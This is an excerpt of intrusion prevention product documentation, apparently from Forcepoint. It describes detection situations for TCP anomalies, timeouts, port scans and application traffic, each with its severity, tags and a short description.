Last changed: sgpkg-ips-306-4219
Description: A SYN-ACK packet was seen in an established connection. A SYN-ACK packet is used during connection establishment. It cannot be used in the middle of a connection. Retransmissions of the initial SYN-ACK (with matching initial sequence number) do not trigger this situation. The default action of permitting this situation in policy implies discarding these packets from the network. Setting this to termination causes the already established connection to terminate as well. Risk analysis: Risk level is low.
Back to top

TCP_Segment-SYN-Fragmented

About this situation: Fragmented SYN packet seen
Context: TCP without parameters
Severity: 2
Tags: Suspected Compromise, Anomalies
First detected in: sgpkg-ips-345-4219
Last changed: sgpkg-ips-535-5211
Description: A fragmented SYN packet was seen. Fragmented SYN packets do not violate the TCP protocol, however there is some TCP/IP stack implementation problems related to this such as CVE-2009-1157. Risk analysis: Risk level is low.
Back to top

TCP_Segment-SYN-ISN-Mismatch

About this situation: Initial sequence number conflict in SYN
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: Initial sequence number carried by SYN from client differed from value seen by IPS earlier during this connection handshake. This condition is checked only when valid acknowledgement to client SYN has not been seen. A valid TCP host should not generate differing ISNs for the same handshake attempt. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Segment-SYN-No-Options

About this situation: SYN packet without TCP options seen
Context: TCP without parameters
Severity: 2
Tags: Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-593-5211
Description: A SYN packet without TCP options was seen. SYN packets without TCP options do not violate the TCP protocol, however there are some DoS tools that generate SYN's without TCP options. Risk analysis: Risk level is low. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Segment-SYN-Options-Conflict

About this situation: SYN(-ACK) packet seen with conflicting options
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: The SYN (or SYN-ACK) packet was seen with TCP options that conflict with previously seen SYN options. E.g., SYN-ACK packet has set option that was not set in previously seen SYN packet. This packet will be dropped by engine unless the connection tracking mode is loose and the situation is not configured to be terminated. Risk analysis: Risk level is low.
Back to top

TCP_Segment-SYN-Unexpected

About this situation: SYN packet seen in established connection
Context: TCP without parameters
Severity: 2
Tags: Protocol Information, Anomalies, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-401-4219
Description: A SYN packet was seen in an established connection. A SYN packet is used to request connection establishment. It cannot be used in the middle of a connection. A SYN packet in an established connection can result if the connection is in a half-open state. In that situation, it is advantageous to allow the SYN packet to go through, because it causes RST to be sent, which resolves the situation. Retransmissions of the initial SYN (with matching initial sequence number) do not trigger this situation. Risk analysis: Risk level is low.
Back to top

TCP_Segment-SYN-Unexpected-Reply

About this situation: Reply to SYN packet was illegible
Context: TCP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-508-5211
Description: Unexpected reply to a SYN packet. The reply to a SYN packet was illegible. Only RST-ACK, RST or SYN-ACK segments are allowed in reply to a SYN packet. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Segment-SYNACK-ISN-Mismatch

About this situation: Initial sequence number conflict in SYNACK
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: Initial sequence number carried by SYN(ACK) from server differed from value seen by IPS earlier during this connection handshake. This condition is checked only when valid acknowledgement to server SYNACK has not been seen. A valid TCP host should not generate differing ISNs for the same handshake attempt. This situation is not generated for strict mode connections, since those are automatically normalized to contain only non-conflicting SYN segments. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Segment-Unexpected-ACK

About this situation: TCP segment acknowledges unseen segment
Context: TCP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Description: The TCP segment acknowledges a segment that has not been seen yet. Such a segment could be the result of the engine not having seen part of the connection. This situation is generated when the connection tracking mode for the traffic is normal or strict. The packet is considered invalid and will always be dropped by the engine, no matter what the configured action is.
Back to top

TCP_Segment-Unexpected-ACK-In-Loose-Mode

About this situation: TCP segment acknowledges unseen segment in Loose connection tracking mode
Context: TCP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: The TCP segment acknowledges a segment that has not been seen yet. Such a segment could be the result of the engine not having seen part of the connection. This situation is generated when the connection tracking mode for the traffic is loose. When the situation is configured to be permitted, the connection is assumed to pass the engine only partially (eg. due to asymmetric routing) and limited inspection is applied to it. Otherwise, the whole connection will be terminated.
Back to top

TCP_Segment-Unexpected-After-SYN

About this situation: Segment seen after SYN was unexpected
Context: TCP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-508-5211
Description: Unexpected segment was seen after the connection-initiating SYN packet. A data-carrying segment or FIN was sent by the SYN sender. Allowed segments at this point are either SYN retransmits, non-data ACKs (old connection on same port tuple) or handshake response by the receiver. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Server-Data-Missing

About this situation: TCP server stream has missed some bytes.
Context: TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1109-5242
Description: TCP server stream has some missed some bytes.
Back to top

TCP_Small-Overlapping-Segment

About this situation: A retransmitted segment is unnecessarily small
Context: TCP without parameters
Severity: 1
Tags: Suspected Denial of Service
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Description: This situation occurs when a retransmitted segment is unnecessarily small. This may be indication of some DoS attack attempt. When configured with Terminate action this drops the small segment. The connection itself is able to proceed. This may be an indicator of CVE-2018-5390.
Back to top

TCP_SSM_Connections-Too-Many

About this situation: Unable to allocate memory for new SSM proxy mode connection
Context: SSM Context
Severity: 1
Tags: SSM Informative Messages, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The engine is unable to allocate memory for new SSM proxy mode connection, either because no memory was available or because there are too many connections.
Back to top

TCP_Stealth_Scan_Started

About this situation: TCP stealth scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New TCP stealth scan activity detected. A host has sent a TCP packet without first initiating a TCP handshake. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

TCP_Strict-Without-Handshake

About this situation: TCP strict mode segment for non open connection
Context: TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-306-4219
Description: The connection opening was not seen for for a incoming TCP segment in TCP strict mode.
Back to top

TCP_Strict_Connections-Too-Many

About this situation: Unable to allocate memory for new strict mode connection
Context: TCP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-371-4219
Description: The engine is unable to allocate memory for new strict mode connection, either because no memory was available or because there are too many connections.
Back to top

TCP_SYN-ACK-With-Data

About this situation: TCP SYNACK segment with data
Context: TCP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-538-5211
Description: A TCP SYNACK segment with data was received. Traditional TCP host implementations don't send data in SYN-ACK segments. Doing so may be an evasion attempt.
Back to top

TCP_SYN-RST-Split-Handshake

About this situation: TCP SYN-RST Split Handshake
Context: TCP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-416-4219
Description: Server refused TCP connection with a valid RST segment, but before expiration of SYN-RST timeout sent a SYN segment without ACK. Some TCP implementations violate RFC 793 and don't transition to CLOSED state on reception of a valid RST segment. It is also possible that the RST is lost after IPS, and this condition requires connection state to be normalized. SYN from the server side after RST is both nonsensical according to RFC 793 as well as an possible evasion attempting to confuse the inspection device regarding direction of connection establishment. Risk analysis: Risk level is medium. This can be an inspection evasion attempt. No valid TCP/IP stack should generate the required traffic pattern.
Back to top

TCP_SYN-With-Data

About this situation: TCP SYN segment with data
Context: TCP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-538-5211
Description: A TCP SYN segment with data was received. This situation does not trigger if also an ACK flag is present. Data in a TCP SYN segment is permitted (RFC793, Section 3.4) and made secure by usage of TCP Fast Open (RFC7413). TCP Fast Open is recommended for example with DNS over TLS (RFC7858, Section 3.4). The Forcepoint Secure SD-WAN engine does not validate the TCP Fast Open cookies, and thus does not separate TCP Fast Open from other SYN segments with data. If deep packet inspection is enabled, the data is passed to fingerprinting. SYN segments with data have been observed to be used as evasion attempts during attacks. In addition, the RFC for TCP Fast Open recommends that a client supporting it should temporarily disable it if receiving a negative response from the server (RFC7413 Section 4.1.3.1). Negative responses include the server not acknowledging the data in the SYN, ICMP error messages, and no response (SYN-ACK) from the server at all, i.e., connection timeout. Because of this, it is recommended that TCP SYN segments with data are dropped. In case TCP SYN segments with data need to be permitted, for example to enable usage of TCP Fast Open, this situation can be set to permit. Make sure that also the situation TCP_Option-Unhandled (engine version 6.11.1 and newer) or TCP_Option-Unsupported (engine version 6.11.0 and older) is also permitted. In case terminating the TCP SYN segments with data silently produces an undesired delay in the TCP connection establishment, configuring the situation to be terminated with a reset is recommended.
Back to top

TCP_SYN_Scan_Started

About this situation: TCP SYN scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New TCP SYN scan activity detected. A host has sent a number of SYN packets to closed TCP ports. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

TCP_Timeout-Connection-Automatic-Establishment-Default

About this situation: TCP Default Automatic Establishment timeout
Context: TCP Timeout Auto Establishment
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-479-5211
Description: This situation occurs if no automatic connection establishment occurs within three seconds of receiving a TCP segment that was not known to be part of any established connection or part of connection establishment.
Back to top

TCP_Timeout-Connection-Dropped

About this situation: TCP Dropped Connection has timed out
Context: TCP Timeout Connection Dropped
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: The default timeout for a TCP Dropped Connection is one day. After this period, the connection is assumed to be dropped, and re-establishment of the connection is allowed.
Back to top

TCP_Timeout-Connection-Dropped-Short

About this situation: TCP Dropped Connection has timed out
Context: TCP Timeout Connection Dropped
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Description: The short timeout for a TCP Dropped Connection is 6 minutes. This is acceptable if connections are not allowed to start in the middle (for example 'TCP_Handshake-Not-Seen-Graceful' is set to terminate).
Back to top

TCP_Timeout-Data-Transfer

About this situation: Timeout for TCP Data Transfer Timeout
Context: TCP Timeout Data Transfer
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: Timeout for TCP Data Transfer Timeout. This situation occurs if either connection end-point attempts to send data, but the other end-point does not reply for longer than 60 seconds.
Back to top

TCP_Timeout-Data-Transfer-Long

About this situation: Timeout for TCP Data Transfer Timeout
Context: TCP Timeout Data Transfer
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Description: Timeout for TCP Data Transfer Timeout. This situation occurs if either connection end-point attempts to send data, but the other end-point does not reply for longer than 300 seconds.
Back to top

TCP_Timeout-Default-Idle

About this situation: Timeout for TCP Idle Timeout
Context: TCP Timeout Idle
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: This situation occurs if the connection has been idle for one day. After this, the connection is assumed to have ended.
Back to top

TCP_Timeout-FIN

About this situation: Timeout after seeing TCP FIN
Context: TCP Timeout FIN
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: Timeout after seeing TCP FIN. This situation occurs if no corresponding ACK is seen for FIN within 60 seconds. When either connection end sends FIN, it says it is wishing to terminate the connection.
Back to top

TCP_Timeout-FIN-Long

About this situation: Timeout after seeing TCP FIN
Context: TCP Timeout FIN
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Description: Timeout after seeing TCP FIN. This situation occurs if no corresponding ACK is seen for FIN within 420 seconds. When either connection end sends FIN, it says it is wishing to terminate the connection.
Back to top

TCP_Timeout-REMOVE_SOON-Wait-Default

About this situation: Default timeout for REMOVE_SOON TCP Connections
Context: TCP Timeout REMOVE_SOON WAIT
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-445-4219
Description: Default timeout for TCP reset connection ("REMOVE_SOON"). See context for a more complete description.
Back to top

TCP_Timeout-REMOVE_SOON-Wait-Long

About this situation: Default timeout for REMOVE_SOON TCP Connections
Context: TCP Timeout REMOVE_SOON WAIT
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Description: Default timeout for TCP reset connection ("REMOVE_SOON"). See context for a more complete description.
Back to top

TCP_Timeout-SYN-ACK-Default

About this situation: TCP Connection Opening timeout
Context: TCP Timeout SYN-ACK
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: TCP Default Connection Opening Timeout. This situation occurs if no corresponding ACK is seen for a SYN-ACK within 5 seconds. This means that the connection establishment has gone half-way and both connection ends have expressed their desires on allowing the connection to get established, but something unexpected occurred.
Back to top

TCP_Timeout-SYN-ACK-Long

About this situation: TCP Connection Opening timeout
Context: TCP Timeout SYN-ACK
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Description: TCP Default Connection Opening Timeout. This situation occurs if no corresponding ACK is seen for a SYN-ACK within 23 seconds. This means that the connection establishment has gone half-way and both connection ends have expressed their desires on allowing the connection to get established, but something unexpected occurred.
Back to top

TCP_Timeout-SYN-Default

About this situation: TCP Connection Request Timeout
Context: TCP Timeout SYN
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-479-5211
Description: Default timeout for TCP Connection Request (SYN). This situation occurs if no corresponding SYN-ACK (Connection Open Allowed) is seen for a SYN (Connection Request) within five seconds.
Back to top

TCP_Timeout-SYN-RST-Default

About this situation: TCP Connection Refused Timeout
Context: TCP Timeout for SYN-RST
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-443-4219
Description: Default timeout for TCP Timeout for SYN-RST. After this period, the handshake is assumed to have timed out for connections that have been refused by valid RST from server. Re-establishment of connection is allowed even immediately after RST, but connecting the same port tuple in opposite direction is controlled by TCP_SYN-RST-Split-Handshake. See situation context description for further details.
Back to top

TCP_Timeout-SYN-RST-Disabled

About this situation: Disable TCP Connection Refused Timeout
Context: TCP Timeout for SYN-RST
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-416-4219
Description: Disable TCP Timeout for SYN-RST. TCP timeout period for SYN-RST is not observed, and connection transfers directly to CLOSED state, and no further handshake normalization related to this situation context is performed. If this situation is configured, it never triggers.
Back to top

TCP_Timeout-TIME-WAIT-Default

About this situation: TCP Connection Reopen Timeout
Context: TCP Timeout TIME-WAIT
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-479-5211
Description: Default timeout for TCP Reopen Connection (TIME-WAIT). After this period, the connection is assumed to be closed, and re-establishment of connection is allowed.
Back to top

TCP_Too-Many-Small-Segments

About this situation: The connection has too many small segments in window
Context: TCP without parameters
Severity: 1
Tags: Suspected Denial of Service
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Description: The connection has too many small segments in window which can sometimes indicate a DoS attack against the endpoint. When configured with Terminate action this drops further small segments and can mitigate the potential DoS attack. The connection itself can proceed. This may be an indicator of CVE-2018-5390.
Back to top

TCP_Urgent

About this situation: TCP header has URG flag set
Context: TCP without parameters
Severity: 1
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-302-4219
Description: The TCP header has URG flag set making the Urgent Pointer field significant..This indicates presence of urgent data in the stream. Risk analysis: Risk level is low. The urgent data is valid feature of TCP protocol but it can be abused to evade IDS/IPS devices. Also aome endpoint implementations might be vulnerable to specific urgent data use patterns. Most relevant log fields: "TCP urgent pointer" shows the TCP Urgent Pointer value, Note: Terminate action for the situation terminates the TCP connection.
Back to top

TCP_Window-Exceeded

About this situation: Data past advertised TCP window is seen
Context: TCP without parameters
Severity: 1
Tags: Anomalies, Protocol Information
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Description: Data past advertised TCP window is seen A TCP segment covering sequence number(s) past window advertised by the recipient is seen. If window scaling options (which are present only in handshake SYN segments) are not seen by the engine, that is, connection is seen from the middle, these situations are not generated as this might produce false positives. Inline mode drops these segments by default. Well-behaving TCP host stacks shouldn't cause this situation to trigger, but on non-inline environments false positives may occur.
Back to top

TCP_Window-Shrinked

About this situation: TCP receive window has shrinked
Context: TCP_Window_Shrinked
Severity: 5
Tags: Inspection
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Windows-TCP-FIN-WAIT-Vulnerability
Description: The TCP receive window was shrinked i.e. the right window edge was moved to left. Risk analysis: Risk level is medium/low. Shrinking the TCP window is discouraged by RFCs (the receiver SHOULD NOT do it). There exist some DoS attack software exploiting the window shrinking (down to zero). Most relevant log fields: "TCP window shrinkage" shows the shrinkage i.e. the amount window right edge was moved to left. "TCP window size" shows the new TCP window value, Note: Terminate action for the situation terminates the TCP connection.
Back to top

TCP_Window-Small

About this situation: Abnormally small TCP window detected
Context: TCP without parameters
Severity: 2
Tags: Suspected Compromise, Anomalies
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-559-5211
Description: An abnormally small TCP window value was detected. This may indicate a Sockstress denial-of-service attack. Risk analysis: Risk level is medium.
Back to top

TCP_Window-Too-Large

About this situation: The connection uses a larger window size than TCP inspection can handle
Context: TCP without parameters
Severity: 1
Tags: Anomalies, Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-454-4333
Description: The connection uses a larger window size than TCP inspection can handle Non-acknowledged TCP segments in transit between a client and server have exceeded the maximum window size that TCP inspection can handle. Depending on the Inspection Policy and the Action for the Situation, the default operation is as follows: - With the Permit Action, evasion protection and inspection accuracy are degraded. This is the default action in the Medium-Security Inspection Policy Template. - With the Terminate action, any packet that does not fit into the TCP segment buffer is dropped but the connection is still allowed through normally. The TCP connection recovers by resending the lost (dropped) packet. An Alert is sent. This is the default action in the High-Security Inspection Policy Template. - To minimize the effect on TCP throughput, newer Firewall/IPS product versions may replace the dropped data segments with TCP keepalive packets, which do not carry data. NOTE! For proper evasion protection, we recommend using the Terminate Action for this Situation. For deployment-specific exceptions, see the Known Limitations section of the Release Notes.
Back to top

TD---Advisor-Services

About this situation: Application TD---Advisor-Services detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TD Ameritrade helps individual investors pursue their financial goals through our brokerage subsidiaries.
Back to top

Td-Ameritrade

About this situation: TD Ameritrade usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: TD Ameritrade offers common and preferred stocks, ETFs, option trades, mutual funds, fixed income, margin lending, and cash management services. Source: Wikipedia
Back to top

TeacherEase

About this situation: Application TeacherEase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Common Goal Systems develops and markets Internet services to the educational market.
Back to top

Teachertube

About this situation: TeacherTube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service is designed to allow those in the educational industry, particulary teachers, to share educational resources such as video, audio, documents, photos, groups, and blogs. The site contains a mixture of classroom teaching resources and others designed to aid teacher training. Source: Wikipedia
Back to top

TeachingBooks.net

About this situation: Application TeachingBooks.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeachingBooks.net is a licensed online database that can be used by teachers, students, librarians and families to explore children's books and young adult literature and their authors.
Back to top

Teads

About this situation: Teads usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-769-5211
Description: Teads is a video advertisement company.
Back to top

Tealium

About this situation: Tealium
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description: Tealium is a customer data platform.
Back to top

Team-Gantt

About this situation: Application Team-Gantt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeamGantt is a way to use gantt chart software online. You can manage your projects with this easy to use gantt software.
Back to top

Team-on-the-Run

About this situation: Application Team-on-the-Run detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Team on the run increases mobile teams productivity by enabling instant, secure and private business conversations from a smartphone app.
Back to top

Team-Org-Chart

About this situation: Application Team-Org-Chart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Team Org Chart is the interactive organization chart tool for Office 365 and Microsoft Azure.
Back to top

Teambook

About this situation: Application Teambook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teambook allow schedule your team efficiently, increase profitability and keep everyone in the loop.
Back to top

TeamDesk

About this situation: Application TeamDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeamDesk online database software combines a fully customizable web application solution and an easily accessible web-database for your team.
Back to top

TeamDrive

About this situation: TeamDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1371-5242
Description: TeamDrive is a cloud-based file sharing application. The application is available for Microsoft Windows, OS X, Linux, Android, and iOS.
Back to top

Teamgate.com

About this situation: Application Teamgate.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teamgate is Cloud based intelligent Sales Stack platform for small and mid-size teams with power to explode sales.
Back to top

Teamly

About this situation: Application Teamly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teamly is a Social Performance Management solution integrated tightly with tibbr, the Social Network for Work. Teamly includes performance reviews, goal management, recognition, and task management. It's also integrated with tibbr mobile and desktop apps.
Back to top

teamspace

About this situation: Application teamspace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teamspace offers the possibility for teams to work together professionally and flexible via internet. The necessary infrastructure for communication, coordination and organization will be provided online by teamspace.
Back to top

TeamSpeak-3

About this situation: TeamSpeak 3 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-664-5211
Description: TeamSpeak 3 is a proprietary VoIP application that allows users to speak on a chat channel with other people.
Back to top

TeamSupport

About this situation: Application TeamSupport detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeamSupport - customer support and help desk software designed for B2B technology companies to share data across teams and dramatically increase customer satisfaction.
Back to top

Teamtalk

About this situation: Application Teamtalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teamtalk - freeware conferencing system for audio and video conversations on the Internet.
Back to top

Teamup

About this situation: Application Teamup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teamup is online calendar for groups projects. Easy to create color-coded calendars share links with customizable access rights.
Back to top

TeamViewer

About this situation: Endpoint Context Agent based TeamViewer detection
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: TeamViewer endpoint application has been detected. TeamViewer is a remote control, desktop sharing and file transfer software.
Back to top

TeamViewer

About this situation: TeamViewer traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1796-5242
Description: TeamViewer is a remote control, desktop sharing and file transfer software.
Back to top

TeamWork-Live

About this situation: Application TeamWork-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeamWork Live is a web-based online project management software and collaboration tool for managing internal and client projects.
Back to top

Teamwork.com

About this situation: Teamwork.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: SmartBrief easily manage your projects and team online. You'll love the powerful features including privacy control, Gantt charts, sub-tasks .
Back to top

TeamWox

About this situation: Application TeamWox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeamWox - Online Team Collaboration Software, that make your company's management process more transparent, improve productivity of your employees and reduce the costs.
Back to top

Teamxbox

About this situation: Teamxbox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

Tecent-QQ-International

About this situation: Tecent QQ international usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Tecent QQ international usage has been detected.
Back to top

Tecent-Qzone

About this situation: Tecent Qzone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Tecent Qzone usage has been detected.
Back to top

Tech-Data

About this situation: Application Tech-Data detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tech Data Corporation is a wholesale distributor of technology products. Distributes microcomputer-related hardware and software products to value-added resellers and retailers.
Back to top

TechCrunch

About this situation: Application TechCrunch detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TechCrunch is a weblog dedicated to profiling and reviewing new Internet products and companies. In addition to covering new companies,it profiles existing companies.
Back to top

